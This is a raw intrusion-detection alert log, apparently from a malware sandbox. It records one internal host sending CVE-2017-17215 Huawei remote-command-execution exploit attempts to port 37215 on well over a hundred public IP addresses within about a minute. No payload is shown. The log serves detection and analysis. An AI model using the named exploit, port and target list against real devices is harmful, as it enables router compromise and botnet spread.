                                                        06/13/24-21:32:40.354787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3330837215192.168.2.14197.119.70.241
                                                        06/13/24-21:32:03.278200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6015437215192.168.2.14197.98.113.18
                                                        06/13/24-21:32:15.606880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5078437215192.168.2.14197.136.94.36
                                                        06/13/24-21:32:17.676846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3964637215192.168.2.1441.165.139.129
                                                        06/13/24-21:33:13.214345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6076037215192.168.2.14156.190.21.155
                                                        06/13/24-21:32:28.045370TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4009037215192.168.2.1441.92.1.60
                                                        06/13/24-21:32:34.213226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4610437215192.168.2.1441.158.79.182
                                                        06/13/24-21:32:01.223946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5570037215192.168.2.14197.24.35.193
                                                        06/13/24-21:32:23.929267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4742437215192.168.2.14156.187.134.13
                                                        06/13/24-21:32:56.757961TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3603637215192.168.2.1441.66.77.239
                                                        06/13/24-21:32:21.804251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4453637215192.168.2.1441.241.60.146
                                                        06/13/24-21:32:36.242408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5152237215192.168.2.14156.141.125.193
                                                        06/13/24-21:32:13.546566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5438437215192.168.2.14156.178.254.72
                                                        06/13/24-21:32:05.344807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5119237215192.168.2.1441.155.73.110
                                                        06/13/24-21:32:28.025384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3511637215192.168.2.1441.193.198.53
                                                        06/13/24-21:33:13.211962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4253037215192.168.2.1441.91.83.179
                                                        06/13/24-21:33:09.112269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3830837215192.168.2.14197.175.160.246
                                                        06/13/24-21:32:52.660797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4292837215192.168.2.14156.182.106.165
                                                        06/13/24-21:32:44.480438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4120637215192.168.2.14156.99.6.206
                                                        06/13/24-21:32:30.091879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5936237215192.168.2.14156.126.176.112
                                                        06/13/24-21:32:15.636147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4359037215192.168.2.14197.101.152.105
                                                        06/13/24-21:32:32.167136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4290437215192.168.2.14156.106.44.178
                                                        06/13/24-21:33:13.212771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5932637215192.168.2.14156.218.101.177
                                                        06/13/24-21:32:42.423346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5946037215192.168.2.14197.228.61.6
                                                        06/13/24-21:32:09.453336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3509437215192.168.2.14156.18.193.115
                                                        06/13/24-21:32:38.297936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5878037215192.168.2.14156.253.23.45
                                                        06/13/24-21:31:57.154081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3950437215192.168.2.14156.214.63.184
                                                        06/13/24-21:32:17.694078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4031437215192.168.2.1441.87.73.37
                                                        06/13/24-21:32:28.046876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5475437215192.168.2.14197.209.99.27
                                                        06/13/24-21:32:36.269090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5657237215192.168.2.1441.85.172.57
                                                        06/13/24-21:32:23.835871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3892437215192.168.2.14197.154.198.144
                                                        06/13/24-21:32:48.572395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5894437215192.168.2.14197.234.28.137
                                                        06/13/24-21:32:11.510243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4653237215192.168.2.14197.62.245.82
                                                        06/13/24-21:33:13.228725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4348837215192.168.2.1441.172.181.90
                                                        06/13/24-21:32:58.824706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3689837215192.168.2.14156.147.2.34
                                                        06/13/24-21:32:28.048098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3893637215192.168.2.14197.236.35.26
                                                        06/13/24-21:32:42.424840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3394437215192.168.2.14156.184.107.191
                                                        06/13/24-21:32:42.403640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5780837215192.168.2.14156.221.200.152
                                                        06/13/24-21:32:25.978215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4542837215192.168.2.14197.212.69.158
                                                        06/13/24-21:32:30.127191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3962837215192.168.2.14156.131.115.72
                                                        06/13/24-21:32:15.608567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5490237215192.168.2.14197.241.97.91
                                                        06/13/24-21:33:11.176031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3844037215192.168.2.14156.91.12.82
                                                        06/13/24-21:32:36.266286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4470237215192.168.2.14197.209.124.220
                                                        06/13/24-21:33:07.057978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5805437215192.168.2.14197.232.38.6
                                                        06/13/24-21:32:38.320618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4793637215192.168.2.1441.34.106.123
                                                        06/13/24-21:32:52.671627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4941437215192.168.2.14156.52.58.240
                                                        06/13/24-21:33:07.055823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5994637215192.168.2.14197.149.31.8
                                                        06/13/24-21:32:21.806061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3659837215192.168.2.1441.70.152.31
                                                        06/13/24-21:32:36.247687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4181237215192.168.2.14197.225.123.128
                                                        06/13/24-21:32:54.724987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4325237215192.168.2.14197.176.47.184
                                                        06/13/24-21:32:48.573021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3680237215192.168.2.14156.22.225.125
                                                        06/13/24-21:32:07.403652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5872437215192.168.2.14156.46.76.62
                                                        06/13/24-21:32:44.453739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5389437215192.168.2.14197.28.33.244
                                                        06/13/24-21:33:13.211934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3296637215192.168.2.14197.23.63.212
                                                        06/13/24-21:31:57.134569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3782437215192.168.2.14156.7.75.75
                                                        06/13/24-21:32:15.630027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3911837215192.168.2.1441.95.170.78
                                                        06/13/24-21:33:13.227164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4823637215192.168.2.14156.108.237.11
                                                        06/13/24-21:31:59.177752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3662837215192.168.2.14156.164.61.20
                                                        06/13/24-21:32:42.406587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4296837215192.168.2.14156.219.70.114
                                                        06/13/24-21:33:04.993013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5146837215192.168.2.1441.111.210.183
                                                        06/13/24-21:33:07.041150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3963637215192.168.2.1441.160.157.237
                                                        06/13/24-21:32:30.079544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3991837215192.168.2.14156.19.229.188
                                                        06/13/24-21:32:09.456241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5025237215192.168.2.14156.168.52.149
                                                        06/13/24-21:32:23.835089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4144637215192.168.2.14197.247.20.220
                                                        06/13/24-21:32:40.353874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5725037215192.168.2.1441.66.132.241
                                                        06/13/24-21:32:46.508079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5380037215192.168.2.14156.11.221.237
                                                        06/13/24-21:33:05.013138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5982837215192.168.2.14197.126.239.182
                                                        06/13/24-21:32:05.378026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4436037215192.168.2.1441.225.232.171
                                                        06/13/24-21:32:44.450891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4363437215192.168.2.14197.241.17.173
                                                        06/13/24-21:32:58.839628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3851437215192.168.2.14156.53.117.148
                                                        06/13/24-21:32:58.820944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4960437215192.168.2.14156.228.0.60
                                                        06/13/24-21:33:13.214014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5759837215192.168.2.1441.162.162.95
                                                        06/13/24-21:33:13.212717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5922437215192.168.2.1441.0.65.255
                                                        06/13/24-21:33:11.157271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3777837215192.168.2.14197.85.76.102
                                                        06/13/24-21:32:34.190957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4102037215192.168.2.1441.151.25.13
                                                        06/13/24-21:32:09.436561TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4025637215192.168.2.14156.213.156.86
                                                        06/13/24-21:33:05.017400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4132237215192.168.2.14197.109.52.36
                                                        06/13/24-21:32:42.409036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4096237215192.168.2.14156.35.40.44
                                                        06/13/24-21:32:30.093759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3961837215192.168.2.14197.4.229.54
                                                        06/13/24-21:32:30.124604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3740437215192.168.2.1441.112.180.3
                                                        06/13/24-21:31:57.132255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5256037215192.168.2.14197.196.65.70
                                                        06/13/24-21:32:42.405873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5427837215192.168.2.14197.196.159.134
                                                        06/13/24-21:31:59.198678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4469437215192.168.2.14197.52.185.92
                                                        06/13/24-21:32:52.659040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3825637215192.168.2.14156.31.253.239
                                                        06/13/24-21:32:01.241970TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6013437215192.168.2.1441.135.22.141
                                                        06/13/24-21:32:56.757183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6078637215192.168.2.14156.100.224.120
                                                        06/13/24-21:32:09.439945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4784637215192.168.2.14156.104.124.16
                                                        06/13/24-21:32:56.787582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5194637215192.168.2.14156.44.243.183
                                                        06/13/24-21:33:00.869088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5504837215192.168.2.1441.152.8.19
                                                        06/13/24-21:32:13.568475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4103837215192.168.2.1441.117.195.8
                                                        06/13/24-21:33:00.884499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3355837215192.168.2.14156.103.84.207
                                                        06/13/24-21:32:46.503256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4360037215192.168.2.14156.215.72.72
                                                        06/13/24-21:32:21.804004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5100837215192.168.2.1441.175.158.224
                                                        06/13/24-21:32:17.677685TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6069637215192.168.2.1441.118.56.181
                                                        06/13/24-21:31:57.091847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4115237215192.168.2.14156.18.202.162
                                                        06/13/24-21:32:11.508412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5764037215192.168.2.14197.88.236.132
                                                        06/13/24-21:32:15.604815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4800037215192.168.2.1441.100.178.170
                                                        06/13/24-21:32:56.790395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5130037215192.168.2.14197.44.206.116
                                                        06/13/24-21:32:01.241772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5069837215192.168.2.14197.117.99.162
                                                        06/13/24-21:33:13.229748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4955637215192.168.2.1441.244.92.39
                                                        06/13/24-21:33:05.016010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3734437215192.168.2.14197.20.147.226
                                                        06/13/24-21:32:09.440141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4958237215192.168.2.14197.128.203.233
                                                        06/13/24-21:31:57.091972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5892837215192.168.2.14156.238.129.165
                                                        06/13/24-21:33:09.106658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4172837215192.168.2.14197.213.19.158
                                                        06/13/24-21:32:54.725420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4669437215192.168.2.1441.69.116.207
                                                        06/13/24-21:32:34.192385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4383437215192.168.2.14197.229.118.108
                                                        06/13/24-21:32:38.318099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4747637215192.168.2.1441.43.172.222
                                                        06/13/24-21:31:57.130292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4925037215192.168.2.14197.182.24.202
                                                        06/13/24-21:32:07.400722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5560837215192.168.2.14197.96.146.94
                                                        06/13/24-21:32:17.670417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4520437215192.168.2.1441.162.128.234
                                                        06/13/24-21:32:25.976947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4145637215192.168.2.14156.39.48.100
                                                        06/13/24-21:32:30.074676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4984437215192.168.2.1441.38.134.140
                                                        06/13/24-21:32:48.555411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3759637215192.168.2.14156.249.227.157
                                                        06/13/24-21:32:34.216491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4828637215192.168.2.14156.67.46.62
                                                        06/13/24-21:32:44.454943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3528437215192.168.2.14156.139.117.226
                                                        06/13/24-21:32:52.655006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4676837215192.168.2.14197.17.22.179
                                                        06/13/24-21:33:15.275726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4242837215192.168.2.1441.67.104.234
                                                        06/13/24-21:32:42.421822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5850637215192.168.2.14197.190.244.27
                                                        06/13/24-21:32:25.975780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5297037215192.168.2.1441.199.103.17
                                                        06/13/24-21:31:57.132273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5215237215192.168.2.14197.92.186.40
                                                        06/13/24-21:32:58.823027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4084237215192.168.2.14156.21.210.2
                                                        06/13/24-21:33:11.174100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4087437215192.168.2.14156.104.220.99
                                                        06/13/24-21:32:58.820517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4805637215192.168.2.1441.236.164.219
                                                        06/13/24-21:32:15.611114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3520237215192.168.2.14197.9.182.101
                                                        06/13/24-21:32:30.099140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5380037215192.168.2.14197.40.209.126
                                                        06/13/24-21:32:05.348947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4843037215192.168.2.14156.236.220.120
                                                        06/13/24-21:32:40.357310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5425637215192.168.2.1441.239.50.209
                                                        06/13/24-21:32:21.804205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4385037215192.168.2.1441.184.97.159
                                                        06/13/24-21:32:58.820901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5649637215192.168.2.14156.131.33.98
                                                        06/13/24-21:33:00.869574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5787237215192.168.2.14156.31.131.22
                                                        06/13/24-21:32:32.155663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5327437215192.168.2.14197.44.41.63
                                                        06/13/24-21:33:04.992074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4865437215192.168.2.14156.65.60.65
                                                        06/13/24-21:32:17.671711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3777437215192.168.2.14197.122.43.106
                                                        06/13/24-21:32:21.802783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5220637215192.168.2.1441.77.26.50
                                                        06/13/24-21:33:09.128685TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5806237215192.168.2.14197.133.232.14
                                                        06/13/24-21:32:54.710068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4255037215192.168.2.14156.176.255.36
                                                        06/13/24-21:32:19.728053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4026637215192.168.2.14156.5.255.178
                                                        06/13/24-21:32:40.356729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3543237215192.168.2.14197.132.204.45
                                                        06/13/24-21:32:58.839436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5398237215192.168.2.14156.246.145.124
                                                        06/13/24-21:32:03.294576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4512437215192.168.2.14156.202.193.218
                                                        06/13/24-21:32:15.606386TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3584837215192.168.2.14197.74.223.221
                                                        06/13/24-21:33:09.089894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5652837215192.168.2.1441.175.163.218
                                                        06/13/24-21:33:04.993753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3804037215192.168.2.1441.136.121.9
                                                        06/13/24-21:32:19.729210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5547637215192.168.2.14156.22.108.81
                                                        06/13/24-21:32:54.725897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5657237215192.168.2.14197.38.179.249
                                                        06/13/24-21:32:30.098064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5276637215192.168.2.14156.71.217.161
                                                        06/13/24-21:32:07.402677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5933237215192.168.2.14197.173.85.96
                                                        06/13/24-21:32:44.457860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3953237215192.168.2.14197.20.221.217
                                                        06/13/24-21:31:59.176655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5323437215192.168.2.1441.117.38.53
                                                        06/13/24-21:32:23.835374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5442637215192.168.2.1441.122.15.113
                                                        06/13/24-21:32:44.478666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5454037215192.168.2.14156.193.109.60
                                                        06/13/24-21:32:07.417954TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4118637215192.168.2.1441.24.15.110
                                                        06/13/24-21:32:32.156163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4304437215192.168.2.1441.59.177.33
                                                        06/13/24-21:31:57.093957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4722037215192.168.2.1441.11.9.160
                                                        06/13/24-21:32:17.676065TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4933237215192.168.2.14197.41.30.228
                                                        06/13/24-21:33:09.091001TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5486237215192.168.2.14197.107.170.77
                                                        06/13/24-21:32:42.404898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4132837215192.168.2.1441.115.46.23
                                                        06/13/24-21:31:59.175617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4054637215192.168.2.14156.116.142.15
                                                        06/13/24-21:32:09.456277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4681437215192.168.2.1441.248.44.113
                                                        06/13/24-21:32:42.419414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4030637215192.168.2.14156.195.208.173
                                                        06/13/24-21:32:30.126898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4272237215192.168.2.1441.230.114.11
                                                        06/13/24-21:33:05.014481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4040637215192.168.2.1441.140.251.132
                                                        06/13/24-21:33:13.211318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4294037215192.168.2.14197.190.163.165
                                                        06/13/24-21:32:46.525374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3820037215192.168.2.1441.89.162.3
                                                        06/13/24-21:33:13.213598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4863837215192.168.2.14197.189.186.228
                                                        06/13/24-21:32:15.607494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5476037215192.168.2.14197.182.144.2
                                                        06/13/24-21:33:13.230577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4233237215192.168.2.14156.125.60.168
                                                        06/13/24-21:32:07.402922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4439437215192.168.2.14197.4.241.236
                                                        06/13/24-21:32:32.164231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3865637215192.168.2.14197.245.232.37
                                                        06/13/24-21:32:36.248767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5937437215192.168.2.14156.80.60.214
                                                        06/13/24-21:32:05.377624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4403637215192.168.2.1441.216.237.77
                                                        06/13/24-21:32:48.569952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4379037215192.168.2.14156.78.79.225
                                                        06/13/24-21:32:48.573238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5027637215192.168.2.14197.10.249.66
                                                        06/13/24-21:32:50.630202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3956437215192.168.2.14197.177.15.199
                                                        06/13/24-21:32:11.508436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5726637215192.168.2.14156.90.102.52
                                                        06/13/24-21:33:02.949872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4883637215192.168.2.14197.198.108.198
                                                        06/13/24-21:31:59.197825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3760637215192.168.2.1441.231.104.194
                                                        06/13/24-21:32:21.784309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4126837215192.168.2.1441.147.234.100
                                                        06/13/24-21:32:50.631791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5236437215192.168.2.1441.176.98.0
                                                        06/13/24-21:33:09.127442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3509837215192.168.2.14197.199.84.86
                                                        06/13/24-21:32:07.415721TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6045637215192.168.2.14156.204.102.65
                                                        06/13/24-21:32:23.831133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3852437215192.168.2.14197.136.177.106
                                                        06/13/24-21:32:17.696893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492837215192.168.2.14197.233.195.202
                                                        06/13/24-21:32:36.246287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5669837215192.168.2.14156.117.150.168
                                                        06/13/24-21:32:46.527511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4349037215192.168.2.1441.185.25.152
                                                        06/13/24-21:32:58.824923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5858437215192.168.2.1441.202.160.48
